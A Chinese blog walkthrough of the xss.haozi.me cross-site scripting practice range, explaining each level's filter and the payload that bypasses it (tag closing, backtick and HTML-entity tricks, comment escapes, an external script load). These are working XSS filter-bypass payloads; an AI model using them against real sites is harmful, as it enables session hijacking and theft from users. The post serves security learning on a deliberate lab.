xss.haozi靶场练习记录

最新推荐文章于 2024-03-13 08:00:00 发布
最新推荐文章于 2024-03-13 08:00:00 发布
阅读量1.1k 收藏 7
点赞数 2
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dexret/article/details/121620117
版权

题目链接:https://xss.haozi.me

该靶场是部署在github上的一个项目,通关条件为弹出两个小人击掌的图片即为通关(单纯弹出弹窗是不属于通关的)

0x00

第一关没啥要点,xss入门基础

payload

<img src="x" onerror="alert(1)">

0x01

从server code和下面输出的html可以看出输入的内容被插入到<textarea></textarea>中,在输入的payload前面加上<textarea>对该标签进行闭合

payload

</textarea><img src="x" onerror="alert(1)">

 0x02

这个原理和0x01差不多,输入的内容被插入到value中,加上">对该标签进行闭合

payload

"><img src="x" onerror="alert(1)">

0x03 

通过server code可以看到该题把()给过滤了,这里可以通过 ` 反引号对输入的()进行替换

payload

<img src="x" onerror="alert`1`">

0x04

通过server code可以看到这道题不仅把()给过滤了,而且反引号也过滤,所以该题思路为将alert(1)中(1)替换为HTML实体

payload

<img src="x" onerror="alert&#40;1&#41;">

0x05 

通过server code可以看到,该题将我们输入的内容利用<!--  -->进行闭合,我们可以利用这个在输入前--!>对其进行闭合

payload

--!><img src="x" onerror="alert(1)">

 0x06

这道题是将我们输入的内容插入input的标签中,我们可以在其加入图片标签使其弹窗,要主要alert(1)要隔行,否则会使onerror被过滤

payload

type=image src="x" onerror
="alert(1)"

0x07 

这道题是过滤了开头和结尾的/<\/?[^>]符号,我们可以通过在结尾少输入>来绕过该正则

payload

<img src="x" onerror="alert(1)"

0x08

通过server code可以看到这道题把<style>标签来进行过滤,可以在前面加个</style>再换行对其进行绕过

payload

</style
><img src="x" onerror="alert(1)">

 

0x09

这道题需要前面输入一个指定的URL,没有对输入有任何过滤

payload

https://www.segmentfault.com><img src="x" onerror="alert(1)">

0x0A

这道题刚开始毫无头绪,看了看大佬写的题解,得知这道题用了一个知识点@,就是但你在网址栏上输入www.baidu.com@www.bilibili.com时,会跳转到b站而不是跳转到百度,这一个利用作者在他的网站写的JS来解题,但是在测试了几大浏览器后,发现该题只有firefox能够成功弹出图片

payload

https://www.segmentfault.com@xss.haozi.me/j.js

0x0B

该题是将我们输入的字符全部转化为大写,JS需要区分大小写,所以我们将该题输入内容转化为HTML实体字符

payload

<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

0x0C

该题是在上一题的基础上增加了<script>过滤,不过对我这种写法没有任何影响

payload

<img src="任意图片名" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

0x0D

这道题是将输入内容带入到了注释中,可以用换行逃逸,把第一行空开,由于过滤了单引号',所以后面的')可以用-->注释掉

payload


alert(1);
-->

0x0E

这道题是匹配了所有<与字母的组合,将标签里的第一个字母前加上下划线_,并且在h1标签里,作者的想法是用阿拉伯字母ſ替换s的大写,该题我是用edge浏览器成功跳出弹窗

payload

<ſcript src="https://xss.haozi.me/j.js"></script>

0x0F

这道题可以通过server code看出,他将我们输入的内容插入<img src οnerrοr="console.error('${escapeHtml(input)}')">中,我们可以将前面和后面的注释掉

payload

');
alert(1)
('

0x10 

这道题也没啥好说的,没有任何过滤,直接输入alert(1)就可以了

payload

alert(1)

0x11

这道题和0x0F差不多,前后注释掉

payload

");alert(1);//

0x12

这道题通过server code可以看到由于"被替换成了\\,所以要用\对其进行转义

payload

\");alert(1);//

 总体来说该靶场还是属于比较简单的,适合新生入门xss

Dexret
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS线上靶场---haozi
qq_52016943的博客
07-29 1252
XSS 在线靶场
xss.haozi靶场通关
weixin_60719780的博客
01-06 386
做完xss-labs靶场后,再继续做这个靶场,感觉这个不是很难,毕竟在第一个靶场也获取了一些经验,但是这个靶场偏向技巧,所以还是以了解为主。
XSS靶场haozi.me)
weixin_52240463的博客
08-15 675
一边看题解一边打了一个下午终于通关 小rookie一个比较菜 很多不会的地方查了很多资料 可能有部分思路和别的地方又雷同 各位姥爷看看就好 目录 0x00 送分题啥过滤没有​ 0x01​textarea 字面意思是文本域 类似text类型 不能触发xss 需要闭合 0x02 0x03 0x04​ 0x05 0x06 0x07 0x08 0x09 0x0a 0x0b 0x0c 0x0d 0x0e 0x0f 0x10 送分题啥过滤没有 0x01tex...
XSS靶场练习
天威一号
02-14 1061
靶场地址:http://xss.fbisb.com/yx/level1.php?name=test 第一关 解析:直接将test修改成为<script>alert(/xss/)</script> 进入第二关 第二关 解析: 1-先输入测试码 ('"<>script) 2-查看源码有部分被过滤 3-闭合input标签部分 4-输入payload: "&g...
xss.haozi.me靶场详解
m0_46467017的博客
07-28 2098
由于xss.haozi.me是一个在线靶场,服务部署在Github,若网速不好,则需要科学上网。由于本靶场是一个白盒测试的靶场,我们可以看到代码的源码,所以可以直接根据源码的限制的条件来思考如何绕过。...
xss.js.zip
07-29
"xss.js.zip"是一个专注于防止XSS攻击的JavaScript模块,它通过严格的输入过滤和白名单策略来确保用户提交的内容不会引入潜在的恶意代码。 首先,"xss.js"的核心功能在于提供了一套完整的输入过滤机制。这个模块会...
一个用于练习XSS靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
sql和xss靶场资料包.zip
12-21
bWAPP latest.zip DVWA-master.zip pikachu-master.zip sqli-labs-master.zip upload-labs-master-21.zip xss闯关小游戏.Zip xxe-lab-masteri靶场.rar PhpStudy20180211.zip vc9x86(必装).eXe vc11 x86.exe
xss.haozi.me靶场练习
m0_70349048的博客
02-28 876
xss攻击
xss靶场练习(一)之xss.haozi.me
angry_program的博客
01-29 7442
目录 前言 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0A 0x0B 0x0C 0x0D 0x0E 0x0F 0x10 0x11 0x12 前言 xss实战第一部曲, 实战的靶场是部署在github上的, 所以可能有些延迟(你懂的), 然后给出地址: https://xss.hao...
XSS漏洞:xss.haozi.me靶场通关
qq_68163788的博客
01-18 2042
xss.haozi.me是一个专门用于测试和学习跨站脚本(XSS)漏洞的靶场XSS漏洞是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,可以获取用户的敏感信息,如Cookie、会话令牌等。 通关xss.haozi.me靶场意味着成功利用了该靶场中的XSS漏洞,并完成了相应的任务。在这个过程中,你需要利用各种XSS漏洞,包括反射型XSS、存储型XSS等,来实现跨站脚本攻击,并获取相应的flag或者完成指定的任务。 通过通关xss.haozi.me靶场,你可以提升自己的Web安全技能,了解XSS
xss.haozi.me靶场“0x0B-0x12”通关教程
最新发布
钟言的博客
03-13 4527
本篇xss.haozi.me靶场的“0x0B-0x12”通关教程,详细内容包含了一、0x0B 实体编码绕过 二、0x0C script绕过 三、0x0D 注释绕过 四、0X0E ſ符号绕过 五、0x0F 编码解码 六、0x10 直接执行 七、0x11 闭合绕过 八、0x12 闭合绕过等内容
xss.haozi.me靶场“0x00-0x0A”通关教程
钟言的博客
03-12 5390
本篇介绍了xss.haozi.me靶场0x00到0x0A通关教程,详细内容包含了:一、靶场介绍 二、第一关 0x00 不做限制 三、第二关 0x01 文本闭合标签绕过 四、第三关 0x02 双引号闭合绕过 五、第四关 0x03 过滤括号 六、第五关 0x04 编码绕过 七、第六关 0x05 注释闭合绕过 八、第七关 0x06 换行绕过 九、第八关 0x07 删除标签 十、第九关 0x08 多加空格绕过 十一、第十关 0x09 闭合绕过 十二、第十一关 0x0A JS调用等内容
XXS靶场haozi
m0_61579490的博客
08-02 470
XXS靶场之线上靶场haozi
xss靶场练习xss.haozi.me解析及答案
lyz_yyds107的博客
08-05 754
靶场绕过
xss.haozi练习通关详解
爱国小白帽
11-05 2516
题目连接:https://xss.haozi.me 0x00 原理解读: 这个游戏是要弹图片才算通关的,光弹窗不行,所以第一关就用最简单的img标签过 payload: <img src="任意图片名" onerror="alert(1)"> 0x01 原理解读: 从server code中可以看到输入的内容被插入到了<textarea>标签中,所以只要闭合这个标签就行了 payload: </textarea><img src="任意图片名" onerror=
haozi/xss-demo通关
ma963852的博客
04-13 257
目录 ​ 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0a 0x0b 0x0c 0x0d 0x0e 0x0f 0x10 0x11 0x12 0x00 <script> alert(1)</script> 0x01 </textarea><script>alert(1)</script> 0x02 "><s...
反射型 xss靶场练习
09-27
在反射型XSS靶场练习中,可以使用以下步骤来进行练习: 1. 首先,找到一个含有反射型XSS漏洞的目标网站。 2. 在目标网站的输入框或URL参数中插入恶意代码,例如<script>alert("XSS")。 3. 提交输入或发送包含恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值